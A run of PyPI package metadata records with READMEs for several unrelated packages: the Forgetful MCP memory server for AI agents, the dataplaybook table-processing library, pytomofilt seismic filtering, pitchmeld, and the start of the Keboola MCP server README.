"query_memory",
{"query": "Jordan payment implementation"}
)
# Returns: Hiring memory + linked entity + relationship context
```
### Tool Categories
Forgetful provides **42 tools** across **6 categories**:
- **Memory Tools** (7) – create, query, update, link, mark obsolete
- **Project Tools** (5) – organize knowledge by context/scope
- **Entity Tools** (15) – track people, orgs, devices; build knowledge graphs
- **Code Artifact Tools** (5) – store reusable code snippets
- **Document Tools** (5) – store long-form content (>400 words)
- **User Tools** (2) – profile and authentication
For complete documentation with extensive examples, see [Complete Tool Reference](docs/tool_reference.md).
---
## How It Works
### Atomic Memory Principle
Inspired by Zettelkasten, each memory stores **one concept** in ~300-400 words:
- **Easily titled** – Forces clarity (200 char limit)
- **Self-contained** – Understandable without external context
- **Linkable** – Small units enable precise knowledge graphs
For detailed content, use Documents and extract 3-7 atomic memories that link to the parent document.
### Automatic Knowledge Graph
When you create a memory:
1. **Embedding generated** – FastEmbed converts content to 384-dimensional vector
2. **Similarity search** – Finds top semantically-related memories (≥0.7 threshold)
3. **Auto-linking** – Creates bidirectional links to top 3-5 matches (configurable)
4. **Graph traversal** – Queries return primary results + 1-hop linked memories
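Steps 2-3 can be sketched with plain cosine similarity. `auto_link` and its inputs here are hypothetical illustrations, not Forgetful's actual code:

```python
import math

def cosine(a, b):
    """Cosine similarity between two equal-length vectors."""
    dot = sum(x * y for x, y in zip(a, b))
    norm_a = math.sqrt(sum(x * x for x in a))
    norm_b = math.sqrt(sum(y * y for y in b))
    return dot / (norm_a * norm_b)

def auto_link(new_vec, existing, threshold=0.7, top_k=3):
    """Return IDs of the top-k memories above the similarity threshold.
    Hypothetical sketch of the auto-linking steps above."""
    scored = [(mid, cosine(new_vec, vec)) for mid, vec in existing.items()]
    scored = [(mid, s) for mid, s in scored if s >= threshold]
    scored.sort(key=lambda t: t[1], reverse=True)
    return [mid for mid, _ in scored[:top_k]]

# Toy 2-d "embeddings" standing in for 384-dimensional vectors
existing = {"m1": [1.0, 0.0], "m2": [0.9, 0.1], "m3": [0.0, 1.0]}
print(auto_link([1.0, 0.05], existing))  # ['m1', 'm2']
```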
### Entities and Knowledge Graphs
Entities represent concrete, real-world things (people, organizations, teams, devices) that can be linked to memories:
- **Typed entities** – Organizations, Individuals, Teams, Devices, or custom types
- **Relationships** – Directional connections (e.g., "Person works_at Organization") with strength and metadata
- **Memory linking** – Associate entities with relevant memories for context
- **Knowledge graph** – Build networks showing how entities relate to each other and your knowledge base
Use entities for concrete things (Sarah Chen, TechFlow Systems, Cache Server 01) and memories for abstract concepts (architectural patterns, decisions, learnings).
### Token Budget Management
Prevents context window overflow:
- Configurable budget (default 8K tokens)
- Results prioritized by importance (9-10 first) → recency (newest first)
- Truncates gracefully if over budget
- Respects max memory count (default 20)
This ensures agents get the most relevant context without overwhelming the LLM.
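The prioritisation above can be sketched as follows; `apply_token_budget` and its field names are assumptions for illustration only:

```python
def apply_token_budget(memories, budget=8000, max_count=20):
    """Order by importance (desc), then recency (newest first), and
    keep results until the token budget or max count is hit.
    Hypothetical sketch; field names are assumptions."""
    ordered = sorted(memories,
                     key=lambda m: (-m["importance"], -m["created"]))
    kept, used = [], 0
    for m in ordered[:max_count]:
        if used + m["tokens"] > budget:
            break                  # truncate gracefully when over budget
        kept.append(m["id"])
        used += m["tokens"]
    return kept

mems = [
    {"id": "a", "importance": 9, "created": 1, "tokens": 3000},
    {"id": "b", "importance": 7, "created": 3, "tokens": 3000},
    {"id": "c", "importance": 9, "created": 2, "tokens": 3000},
]
print(apply_token_budget(mems, budget=6500))  # ['c', 'a']
```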
For deep dive on search architecture (dense → sparse → RRF → cross-encoder), see [Search Documentation](docs/search.md).
---
## Configuration
**No configuration required** – Forgetful uses sensible defaults out of the box.
### Key Settings (Optional)
- `MEMORY_TOKEN_BUDGET` – Max tokens for query results (default: `8000`)
- `EMBEDDING_MODEL` – Embedding model (default: `BAAI/bge-small-en-v1.5`)
- `MEMORY_NUM_AUTO_LINK` – Auto-link count (default: `3`, set `0` to disable)
- `SERVER_PORT` – HTTP server port (default: `8020`)
For all 40+ environment variables with detailed explanations, see [Configuration Guide](docs/configuration.md).
---
## Documentation
### Guides
- **[Core Concepts](docs/concepts.md)** – Memories vs Entities vs Documents explained
- **[Complete Tool Reference](docs/tool_reference.md)** – All 42 tools with extensive examples
- **[REST API Reference](docs/api_reference.md)** – HTTP endpoints for web UI integration
- [Configuration Guide](docs/configuration.md) – All environment variables explained
- [Connectivity Guide](docs/connectivity_guide.md) – Connect Claude and other MCP clients
- [Self-Hosting Guide](docs/self-hosting-guide.md) – Deploy on a VPS with Docker
- [Search Documentation](docs/search.md) – Embedding pipeline and retrieval architecture
- [Embedding Migration](docs/embedding_migration.md) – Switch embedding providers safely
- [Features Roadmap](docs/features_roadmap.md) – Planned features and priorities
### External Resources
- [MCP Protocol Specification](https://modelcontextprotocol.io/) – Model Context Protocol docs
- [pgvector](https://github.com/pgvector/pgvector) – PostgreSQL vector extension
- [FastEmbed](https://github.com/qdrant/fastembed) – Local embedding generation
- [Zettelkasten Principle](https://en.wikipedia.org/wiki/Zettelkasten) – Atomic note-taking method
---
## Contributing
We welcome contributions! Forgetful uses integration + E2E testing with Docker Compose orchestration.
See [Contributors Guide](docs/contributors.md) for:
- Testing workflows (integration tests, E2E tests, GitHub Actions)
- Development setup (local vs Docker)
- CI/CD pipeline details
- Release process
---
## License
MIT License - see [LICENSE](LICENCE.md) for details.
| text/markdown | null | Scott <scott@example.com> | null | null | MIT | null | [
"Development Status :: 4 - Beta",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Programming Language :: Python :: 3.12",
"Topic :: Scientific/Engineering :: Artificial Intelligence"
] | [] | null | null | >=3.12 | [] | [] | [] | [
"aiosqlite>=0.21.0",
"alembic>=1.17.2",
"asyncpg>=0.30.0",
"dotenv>=0.9.9",
"fastapi>=0.116.1",
"fastembed>=0.7.3",
"fastmcp>=2.14.1",
"google-generativeai>=0.8.5",
"httpx>=0.28.1",
"openai>=2.8.0",
"pgvector>=0.4.1",
"platformdirs>=4.0.0",
"psycopg2-binary>=2.9.11",
"pydantic-settings>=2.10.1",
"pydantic>=2.11.7",
"pytest-asyncio>=0.24.0",
"pytest>=8.4.1",
"requests>=2.32.5",
"sqlalchemy[asyncio]>=2.0.44",
"sqlite-vec>=0.1.6",
"tiktoken>=0.12.0",
"uvicorn>=0.35.0",
"ollama>=0.4; extra == \"ollama\""
] | [] | [] | [] | [
"Homepage, https://github.com/scottrbk/forgetful",
"Repository, https://github.com/scottrbk/forgetful",
"Issues, https://github.com/scottrbk/forgetful/issues"
] | twine/6.1.0 CPython/3.13.7 | 2026-02-20T09:29:10.957721 | forgetful_ai-0.2.3.tar.gz | 180,854 | c7/4c/5a6bfb0ca3b576b2c23a8854f0b277b20fa55c6e96a7d060a0bcc8f6c442/forgetful_ai-0.2.3.tar.gz | source | sdist | null | false | 9cd0af4648db1d803fc0331d9d621e7c | 32157378406f8b881c60f6c429ea17a4f431d8d025ab00f26602b78ef81e6cd1 | c74c5a6bfb0ca3b576b2c23a8854f0b277b20fa55c6e96a7d060a0bcc8f6c442 | null | [
"LICENCE.md"
] | 322 |
2.3 | dataplaybook | 1.2.10 | Playbooks for data. Open, process and save table based data. | # Data Playbook
:book: Playbooks for data. Open, process and save table based data.
[](https://github.com/kellerza/data-playbook/actions)
[](https://codecov.io/gh/kellerza/data-playbook)
Automate repetitive tasks on table based data. Include various input and output tasks.
Install: `pip install dataplaybook`
Use the `@task` and `@playbook` decorators
```python
from dataplaybook import task, playbook
from dataplaybook.tasks.io_xlsx import read_excel, write_excel

# Minimal illustrative task; see the dataplaybook/tasks folder for real examples
@task
def print_greeting(*, text: str) -> None:
    print(text)
```
## Tasks
Tasks are implemented as simple Python functions and the modules can be found in the dataplaybook/tasks folder.
| Description | Module | Functions |
|:-------------------------------------------------|-------------------------------|:-----------------------------------------------------------------------------------------------|
| Generic function to work on tables | `dataplaybook.tasks` | build_lookup, build_lookup_var, combine, drop, extend, filter, print, replace, unique, vlookup |
| Fuzzy string matching                            | `dataplaybook.tasks.fuzzy`    | Requires _pip install fuzzywuzzy_                                                               |
| Read/write Excel files                           | `dataplaybook.tasks.io_xlsx`  | read_excel, write_excel                                                                         |
| Misc IO tasks | `dataplaybook.tasks.io_misc` | read_csv, read_tab_delim, read_text_regex, wget, write_csv |
| MongoDB functions | `dataplaybook.tasks.io_mongo` | read_mongo, write_mongo, columns_to_list, list_to_columns |
| PDF functions. Requires _pdftotext_ on your path | `dataplaybook.tasks.io_pdf` | read_pdf_pages, read_pdf_files |
| Read XML | `dataplaybook.tasks.io_xml` | read_xml |
```bash
$ dataplaybook --all -vvv
dataplaybook.tasks
- build_lookup "(*, table: list[RowData], key: str, columns: list[str]) -> Generator[RowData]"
- build_lookup_dict "(*, table: list[RowData], key: str | list[str], columns: list[str] | None = None) -> dict[str | tuple, Any]"
- combine "(*, tables: list[list[RowData]], key: str, columns: list[str], value: Union[Literal[True], str] = True) -> list[RowData]"
- ensure_lists "(*, tables: Sequence[list[RowData]], columns: Sequence[str]) -> None"
- filter_rows "(*, table: list[RowData], include: dict[str, str] | None = None, exclude: dict[str, str | list[str] | re.Pattern] | None
= None) -> Generator[RowData]"
- print_table "(*, table: list[RowData] | None = None, tables: dict[str, list[RowData]] | DataEnvironment | None = None) -> None"
- remove_null "(*, tables: Sequence[list[RowData]]) -> None"
- replace "(*, table: list[RowData], replace_dict: dict[str, str], columns: list[str]) -> None"
- unique "(*, table: list[RowData], key: str) -> Generator[RowData]"
- vlookup "(*, table0: list[RowData], acro: list[RowData], columns: list[str]) -> None"
dataplaybook.tasks.fuzzy
- fuzzy_match "(*, table1: list[RowData], table2: list[RowData], t1_column: str, t2_column: str, t1_target_column: str) -> None"
dataplaybook.tasks.ietf
- add_standards_column "(*, table: list[RowData], columns: list[str], rfc_col: str) -> None"
- extract_standards_from_table "(*, table: list[RowData], extract_columns: list[str], include_columns: list[str] | None = None, name: str = '', line_offset: int = 1) -> Generator[RowData]"
dataplaybook.tasks.gis
- linestring "(*, table: list[RowData], lat_a: str = 'latA', lat_b: str = 'latB', lon_a: str = 'lonA', lon_b: str = 'lonB', linestring_column: str = 'linestring', error: str = '22 -22') -> list[RowData]"
dataplaybook.tasks.io_mail
- mail "(*, to_addrs: list[str] | str, from_addr: str, subject: str, server: str, files: list[str] | None = None, priority: int = 4, body: str | None = '', html: str | None = '', cc_addrs: list[str] | None = None, bcc_addrs: list[str] | None = None) -> None"
dataplaybook.tasks.io_misc
- file_rotate "(*, file: os.PathLike | str, count: int = 3) -> None"
- glob "(*, patterns: list[str]) -> Generator[RowData]"
- read_csv "(*, file: os.PathLike | str, columns: dict[str, str] | None = None) -> Generator[RowData]"
- read_json "(*, file: os.PathLike | str) -> list[RowData]"
- read_tab_delim "(*, file: os.PathLike | str, headers: list[str]) -> Generator[RowData]"
- read_text_regex "(*, file: os.PathLike | str, newline: re.Pattern, fields: re.Pattern | None) -> Generator[RowData]"
- wget "(*, url: str, file: os.PathLike | str, age: int = 172800, headers: dict[str, str] | None = None) -> None"
- write_csv "(*, table: list[RowData], file: os.PathLike | str, header: list[str] | None = None) -> None"
- write_json "(*, data: dict[str, list[RowData]] | DataEnvironment | list[RowData], file: os.PathLike | str, only_var: bool = False) ->
None"
dataplaybook.tasks.io_mongo
- columns_to_list "(*, table: 'list[RowData]', list_column: 'str', columns: 'list[str]') -> 'None'"
- list_to_columns "(*, table: 'list[RowData]', list_column: 'str', columns: 'list[str]') -> 'None'"
- mongo_delete_sids "(*, mdb: 'MongoURI', sids: 'list[str]') -> 'None'"
- mongo_list_sids "(*, mdb: 'MongoURI') -> 'list[str]'"
- mongo_sync_sids "(*, mdb_local: 'MongoURI', mdb_remote: 'MongoURI', ignore_remote: 'abc.Sequence[str] | None' = None, only_sync_sids:
'abc.Sequence[str] | None' = None) -> 'None'"
- read_mongo "(*, mdb: 'MongoURI', set_id: 'str | None' = None) -> 'Generator[RowData]'"
- write_mongo "(*, table: 'list[RowData]', mdb: 'MongoURI', set_id: 'str | None' = None, force: 'bool' = False) -> 'None'"
dataplaybook.tasks.io_pdf
- read_pdf_files "(*, folder: str, pattern: str = '*.pdf', layout: bool = True, args: list[str] | None = None) -> Generator[RowData]"
- read_pdf_pages "(*, file: os.PathLike | str, layout: bool = True, args: list[str] | None = None) -> Generator[RowData]"
dataplaybook.tasks.io_xlsx
- read_excel "(*, tables: dict[str, list[RowData]] | DataEnvironment, file: os.PathLike | str, sheets: list[dataplaybook.tasks.io_xlsx.Sheet] | None = None) -> list[str]"
- write_excel "(*, tables: dict[str, list[RowData]] | DataEnvironment, file: os.PathLike | str, include: list[str] | None = None, sheets: list[dataplaybook.tasks.io_xlsx.Sheet] | None = None, ensure_string: bool = False) -> None"
dataplaybook.tasks.io_xml
- read_lxml "(*, tables: dict[str, list[RowData]] | DataEnvironment, file: str, targets: list[str]) -> None"
- read_xml "(*, tables: dict[str, list[RowData]] | DataEnvironment, file: str, targets: list[str]) -> None"
```
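All task signatures above take keyword-only arguments (note the leading `*`). As a minimal sketch of that pattern, here is an illustrative re-implementation of the `unique` task — not the library's actual code, just the same signature shape with rows as plain dicts:

```python
from collections.abc import Generator
from typing import Any

RowData = dict[str, Any]  # in this sketch a row is simply a dict

def unique(*, table: list[RowData], key: str) -> Generator[RowData, None, None]:
    """Yield only the first row seen for each value of `key`."""
    seen: set[Any] = set()
    for row in table:
        if row.get(key) not in seen:
            seen.add(row.get(key))
            yield row

rows = [{"id": 1, "x": "a"}, {"id": 1, "x": "b"}, {"id": 2, "x": "c"}]
result = list(unique(table=rows, key="id"))  # one row per id
```

Because every argument is keyword-only, calls stay self-documenting and map directly onto the playbook YAML keys.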
## Local development
uv is used for dependency management. To install the dependencies:
```bash
uv sync --all-extras
```
pre-commit hooks, run via prek, are used for code formatting and linting. Install prek and run `prek install` to install the git hooks.
```bash
uv tool install prek
prek install
```
Test locally by running the pre-commit hooks (ruff, codespell, mypy):
```bash
git add . && prek
```
## Data Playbook v0 - origins
Data Playbook was created to replace various snippets of code I had lying around. They were all written to ensure the repeatability of some menial task, and generally followed a similar structure: load something, process it, and save it. (Processing network data for GIS tools, network audits & reporting on router & NMS output, extracting IETF standards to complete SoCs, reading my bank statements into my Excel budgeting tool, etc.)
For many of these tasks I have specific processing code (`tasks_x.py`, loaded with `modules: [tasks_x]` in the playbook), but in almost all cases input & output tasks (and configuring these names etc) are common. The idea of the modular tasks originally came from Home Assistant, where I started learning Python and the idea of "custom components" to add your own integrations, although one could argue this also has similarities to Ansible playbooks.
In many cases I have a 'loose' coupling to actual file names, using Everything search (`!es search_pattern` in the playbook) to resolve a search pattern to the correct file used for input.
It has some parts in common with Ansible Playbooks; the name, in particular, was chosen after I was introduced to Ansible Playbooks. The task structure was updated in 2019 to match the Ansible Playbook 2.0/2.5+ format and to allow named tasks. This format will also make it easier to introduce loop mechanisms and the like.
### Comparison to Ansible Playbooks
Data playbooks is intended to create and modify variables in the environment (similar to **inventory**). Data playbooks starts with an empty environment (although you can read the environment from various sources inside the play).
Although new variables can be created using **register:** in Ansible, data playbook functions require the output to be captured through `target:`.
Data playbook tasks are different from Ansible's **actions**:
- They are mostly not idempotent, since the intention is to modify tables as we go along,
- they can return lists containing rows or be Python iterators (that `yield` rows of a table)
- if they don't return any tabular data (a list), the return value will be added to the `var` table in the environment
- each has a strict voluptuous schema, evaluated at load time and during runtime (e.g. to expand templates), to allow quick troubleshooting
You could argue I can do this with Ansible, but it won't be as elegant with single item hosts files, `gather_facts: no` and `delegate_to: localhost` throughout the playbooks. It will likely only be half as much fun trying to force it into my way of thinking.
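The return-value behavior described above can be sketched with a toy environment. This is illustrative only — the real library dispatches through decorators and a `DataEnvironment` class, and the names below are hypothetical:

```python
from collections.abc import Iterator
from typing import Any

def capture_result(env: dict[str, Any], target: str, result: Any) -> None:
    """Toy dispatch: tabular results become a named table, scalars land in `var`."""
    if isinstance(result, Iterator):
        result = list(result)  # drain generator tasks into a concrete table
    if isinstance(result, list):
        env[target] = result  # tabular data: stored under the target name
    else:
        env.setdefault("var", {})[target] = result  # non-tabular: goes to `var`

env: dict[str, Any] = {}
capture_result(env, "cities", iter([{"name": "Rome"}, {"name": "Oslo"}]))
capture_result(env, "row_count", 2)
```

This mirrors the rule that a task may either yield/return rows (captured via `target:`) or return a plain value, which ends up in the `var` table.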
## Release
Semantic versioning is used for releases.
To create a new release, prefix the commit message with a :dolphin: (patch) or :rocket: (minor) emoji. This will trigger a release on the master branch.
```bash
# Patch
git commit -m ":dolphin: Release 0.0.x"
# Minor
git commit -m ":rocket: Release 0.x.0"
```
| text/markdown | Johann Kellerman | Johann Kellerman <kellerza@gmail.com> | null | null | Apache License Version 2.0, January 2004 http://www.apache.org/licenses/ TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION 1. Definitions. "License" shall mean the terms and conditions for use, reproduction, and distribution as defined by Sections 1 through 9 of this document. "Licensor" shall mean the copyright owner or entity authorized by the copyright owner that is granting the License. "Legal Entity" shall mean the union of the acting entity and all other entities that control, are controlled by, or are under common control with that entity. For the purposes of this definition, "control" means (i) the power, direct or indirect, to cause the direction or management of such entity, whether by contract or otherwise, or (ii) ownership of fifty percent (50%) or more of the outstanding shares, or (iii) beneficial ownership of such entity. "You" (or "Your") shall mean an individual or Legal Entity exercising permissions granted by this License. "Source" form shall mean the preferred form for making modifications, including but not limited to software source code, documentation source, and configuration files. "Object" form shall mean any form resulting from mechanical transformation or translation of a Source form, including but not limited to compiled object code, generated documentation, and conversions to other media types. "Work" shall mean the work of authorship, whether in Source or Object form, made available under the License, as indicated by a copyright notice that is included in or attached to the work (an example is provided in the Appendix below). "Derivative Works" shall mean any work, whether in Source or Object form, that is based on (or derived from) the Work and for which the editorial revisions, annotations, elaborations, or other modifications represent, as a whole, an original work of authorship. 
For the purposes of this License, Derivative Works shall not include works that remain separable from, or merely link (or bind by name) to the interfaces of, the Work and Derivative Works thereof. "Contribution" shall mean any work of authorship, including the original version of the Work and any modifications or additions to that Work or Derivative Works thereof, that is intentionally submitted to Licensor for inclusion in the Work by the copyright owner or by an individual or Legal Entity authorized to submit on behalf of the copyright owner. For the purposes of this definition, "submitted" means any form of electronic, verbal, or written communication sent to the Licensor or its representatives, including but not limited to communication on electronic mailing lists, source code control systems, and issue tracking systems that are managed by, or on behalf of, the Licensor for the purpose of discussing and improving the Work, but excluding communication that is conspicuously marked or otherwise designated in writing by the copyright owner as "Not a Contribution." "Contributor" shall mean Licensor and any individual or Legal Entity on behalf of whom a Contribution has been received by Licensor and subsequently incorporated within the Work. 2. Grant of Copyright License. Subject to the terms and conditions of this License, each Contributor hereby grants to You a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable copyright license to reproduce, prepare Derivative Works of, publicly display, publicly perform, sublicense, and distribute the Work and such Derivative Works in Source or Object form. 3. Grant of Patent License. 
Subject to the terms and conditions of this License, each Contributor hereby grants to You a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable (except as stated in this section) patent license to make, have made, use, offer to sell, sell, import, and otherwise transfer the Work, where such license applies only to those patent claims licensable by such Contributor that are necessarily infringed by their Contribution(s) alone or by combination of their Contribution(s) with the Work to which such Contribution(s) was submitted. If You institute patent litigation against any entity (including a cross-claim or counterclaim in a lawsuit) alleging that the Work or a Contribution incorporated within the Work constitutes direct or contributory patent infringement, then any patent licenses granted to You under this License for that Work shall terminate as of the date such litigation is filed. 4. Redistribution. You may reproduce and distribute copies of the Work or Derivative Works thereof in any medium, with or without modifications, and in Source or Object form, provided that You meet the following conditions: (a) You must give any other recipients of the Work or Derivative Works a copy of this License; and (b) You must cause any modified files to carry prominent notices stating that You changed the files; and (c) You must retain, in the Source form of any Derivative Works that You distribute, all copyright, patent, trademark, and attribution notices from the Source form of the Work, excluding those notices that do not pertain to any part of the Derivative Works; and (d) If the Work includes a "NOTICE" text file as part of its distribution, then any Derivative Works that You distribute must include a readable copy of the attribution notices contained within such NOTICE file, excluding those notices that do not pertain to any part of the Derivative Works, in at least one of the following places: within a NOTICE text file distributed as part of the 
Derivative Works; within the Source form or documentation, if provided along with the Derivative Works; or, within a display generated by the Derivative Works, if and wherever such third-party notices normally appear. The contents of the NOTICE file are for informational purposes only and do not modify the License. You may add Your own attribution notices within Derivative Works that You distribute, alongside or as an addendum to the NOTICE text from the Work, provided that such additional attribution notices cannot be construed as modifying the License. You may add Your own copyright statement to Your modifications and may provide additional or different license terms and conditions for use, reproduction, or distribution of Your modifications, or for any such Derivative Works as a whole, provided Your use, reproduction, and distribution of the Work otherwise complies with the conditions stated in this License. 5. Submission of Contributions. Unless You explicitly state otherwise, any Contribution intentionally submitted for inclusion in the Work by You to the Licensor shall be under the terms and conditions of this License, without any additional terms or conditions. Notwithstanding the above, nothing herein shall supersede or modify the terms of any separate license agreement you may have executed with Licensor regarding such Contributions. 6. Trademarks. This License does not grant permission to use the trade names, trademarks, service marks, or product names of the Licensor, except as required for reasonable and customary use in describing the origin of the Work and reproducing the content of the NOTICE file. 7. Disclaimer of Warranty. 
Unless required by applicable law or agreed to in writing, Licensor provides the Work (and each Contributor provides its Contributions) on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied, including, without limitation, any warranties or conditions of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A PARTICULAR PURPOSE. You are solely responsible for determining the appropriateness of using or redistributing the Work and assume any risks associated with Your exercise of permissions under this License. 8. Limitation of Liability. In no event and under no legal theory, whether in tort (including negligence), contract, or otherwise, unless required by applicable law (such as deliberate and grossly negligent acts) or agreed to in writing, shall any Contributor be liable to You for damages, including any direct, indirect, special, incidental, or consequential damages of any character arising as a result of this License or out of the use or inability to use the Work (including but not limited to damages for loss of goodwill, work stoppage, computer failure or malfunction, or any and all other commercial damages or losses), even if such Contributor has been advised of the possibility of such damages. 9. Accepting Warranty or Additional Liability. While redistributing the Work or Derivative Works thereof, You may choose to offer, and charge a fee for, acceptance of support, warranty, indemnity, or other liability obligations and/or rights consistent with this License. However, in accepting such obligations, You may act only on Your own behalf and on Your sole responsibility, not on behalf of any other Contributor, and only if You agree to indemnify, defend, and hold each Contributor harmless for any liability incurred by, or claims asserted against, such Contributor by reason of your accepting any such warranty or additional liability. END OF TERMS AND CONDITIONS APPENDIX: How to apply the Apache License to your work. 
To apply the Apache License to your work, attach the following boilerplate notice, with the fields enclosed by brackets "[]" replaced with your own identifying information. (Don't include the brackets!) The text should be enclosed in the appropriate comment syntax for the file format. We also recommend that a file or class name and description of purpose be included on the same "printed page" as the copyright notice for easier identification within third-party archives. Copyright [yyyy] [name of copyright owner] Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. | data, excel, generators, mongodb, tables | [
"Development Status :: 2 - Pre-Alpha",
"Intended Audience :: Developers",
"Natural Language :: English",
"Programming Language :: Python :: 3 :: Only",
"Programming Language :: Python :: 3.12",
"Programming Language :: Python :: 3.13",
"Programming Language :: Python :: 3.14"
] | [] | null | null | >=3.12 | [] | [] | [] | [
"cattrs<27,>=24",
"colordict>=1.2.6",
"colorlog<7,>=6",
"fuzzywuzzy",
"icecream",
"jinja2<4,>=3",
"office365-rest-python-client<3,>2",
"openpyxl==3.1.5",
"python-levenshtein",
"requests<3,>=2",
"typeguard>=4.4.2",
"whenever<1,>=0.9",
"lxml<7,>=5.4; extra == \"all\"",
"pymongo<5,>=4; extra == \"all\"",
"python-pptx; extra == \"all\""
] | [] | [] | [] | [
"Homepage, https://github.com/kellerza/data-playbook",
"Repository, https://github.com/kellerza/data-playbook"
] | uv/0.10.2 {"installer":{"name":"uv","version":"0.10.2","subcommand":["publish"]},"python":null,"implementation":{"name":null,"version":null},"distro":{"name":"Ubuntu","version":"24.04","id":"noble","libc":null},"system":{"name":null,"release":null},"cpu":null,"openssl_version":null,"setuptools_version":null,"rustc_version":null,"ci":true} | 2026-02-20T09:29:06.944808 | dataplaybook-1.2.10.tar.gz | 43,278 | ee/c6/4115ca15e35ae55439b891e964146ab09aefa9a42fc289d54b448dc98bb3/dataplaybook-1.2.10.tar.gz | source | sdist | null | false | 994f0e137eb1f390151d62892987cf15 | 3929bbabe8c3d6f16349137c1654446517c2ccee2fc74d239add413bbd6c1748 | eec64115ca15e35ae55439b891e964146ab09aefa9a42fc289d54b448dc98bb3 | null | [] | 248 |
2.4 | pytomofilt | 0.0.1a0 | Tomographic filtering in python | # pytomofilt
Pytomofilt is a Python package for tomographic filtering of synthetic seismic velocity models using resolution operators from the RTS suite of models, which includes S20RTS, S40RTS, and SP12RTS. Pytomofilt is released under an MIT license.
| text/markdown | Justin Leung, Andrew Walker | null | null | null | MIT License Copyright (c) 2024 justinleung4732 Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. | null | [
"License :: OSI Approved :: MIT License",
"Programming Language :: Python :: 3",
"Development Status :: 3 - Alpha",
"Environment :: Console",
"Intended Audience :: Science/Research"
] | [] | null | null | <=3.12,>=3.9 | [] | [] | [] | [
"pyshtools",
"cartopy",
"terratools",
"numba",
"scipy",
"numpy",
"typer",
"typing_extensions",
"pytest; extra == \"test\"",
"pytest-cov; extra == \"test\""
] | [] | [] | [] | [] | uv/0.9.13 {"installer":{"name":"uv","version":"0.9.13"},"python":null,"implementation":{"name":null,"version":null},"distro":{"name":"macOS","version":null,"id":null,"libc":null},"system":{"name":null,"release":null},"cpu":null,"openssl_version":null,"setuptools_version":null,"rustc_version":null,"ci":null} | 2026-02-20T09:28:46.968458 | pytomofilt-0.0.1a0-py3-none-any.whl | 17,612 | c1/13/75bd990ac1024ef32a3b309857d50e30da935174dc07f7ff44f9092944b1/pytomofilt-0.0.1a0-py3-none-any.whl | py3 | bdist_wheel | null | false | 47c8b2b945a9d0b000cd09ee54c5dddd | 3525ff091808a351ceb98075ba401b4c3da376a61c63be0c6b164ee9b20c1b42 | c11375bd990ac1024ef32a3b309857d50e30da935174dc07f7ff44f9092944b1 | null | [
"LICENSE"
] | 228 |
2.4 | pitchmeld | 0.50.0 | Please see https://pitchmeld.ing | # Pitchmeld
Copyright 2025 Gilles Degottex.
Main website and account creation can be found here: https://pitchmeld.ing
Documentation of the latest version can be found here: https://doc.pitchmeld.ing
You can also find the documentation in the python package.
The license is proprietary; please see the doc/LICENSE.md file in this package, see https://doc.pitchmeld.ing/license.html, or contact the author at contact@pitchmeld.ing
| text/markdown | Gilles Degottex | dev@pitchmeld.ing | null | null | LicenseRef-Proprietary | null | [
"Programming Language :: Python :: 3",
"Operating System :: OS Independent",
"Development Status :: 1 - Planning",
"Environment :: Console"
] | [] | https://doc.pitchmeld.ing | null | >=3.9 | [] | [] | [] | [
"numpy>=1.0"
] | [] | [] | [] | [] | twine/6.1.0 CPython/3.13.7 | 2026-02-20T09:28:41.717293 | pitchmeld-0.50.0-cp39-cp39-win_amd64.whl | 3,530,198 | fc/56/e37a1773ecacd444653f8e0ca557038846d1cab9db81809bac707dffaefa/pitchmeld-0.50.0-cp39-cp39-win_amd64.whl | cp39 | bdist_wheel | null | false | 222fbd213d2f1b737ba47b490139d86c | af958b0beac2fe8406a470abee803c5504e084d836a6c8dce24c0bf2f2585d7c | fc56e37a1773ecacd444653f8e0ca557038846d1cab9db81809bac707dffaefa | null | [
"LICENSE.md"
] | 659 |
2.4 | keboola-mcp-server | 1.44.7 | MCP server for interacting with Keboola Connection | [](https://deepwiki.com/keboola/mcp-server)
# Keboola MCP Server
> Connect your AI agents, MCP clients (**Cursor**, **Claude**, **Windsurf**, **VS Code** ...) and other AI assistants to Keboola. Expose data, transformations, SQL queries, and job triggers—no glue code required. Deliver the right data to agents when and where they need it.
## Overview
Keboola MCP Server is an open-source bridge between your Keboola project and modern AI tools. It turns Keboola features—like storage access, SQL transformations, and job triggers—into callable tools for Claude, Cursor, CrewAI, LangChain, Amazon Q, and more.
- [Quick Start](#-quick-start-remote-mcp-server-easiest-way)
- [Local Setup](#local-mcp-server-setup-custom-or-dev-way)
## Features
With the AI Agent and MCP Server, you can:
- **Storage**: Query tables directly and manage table or bucket descriptions
- **Components**: Create, list, and inspect extractors, writers, data apps, and transformation configurations
- **SQL**: Create SQL transformations with natural language
- **Jobs**: Run components and transformations, and retrieve job execution details
- **Flows**: Build and manage workflow pipelines using Conditional Flows and Orchestrator Flows
- **Data Apps**: Create, deploy, and manage Keboola Streamlit Data Apps displaying your queries over storage data
- **Metadata**: Search, read, and update project documentation and object metadata using natural language
- **Dev Branches**: Work safely in development branches outside of production, where all operations are scoped to the selected branch.
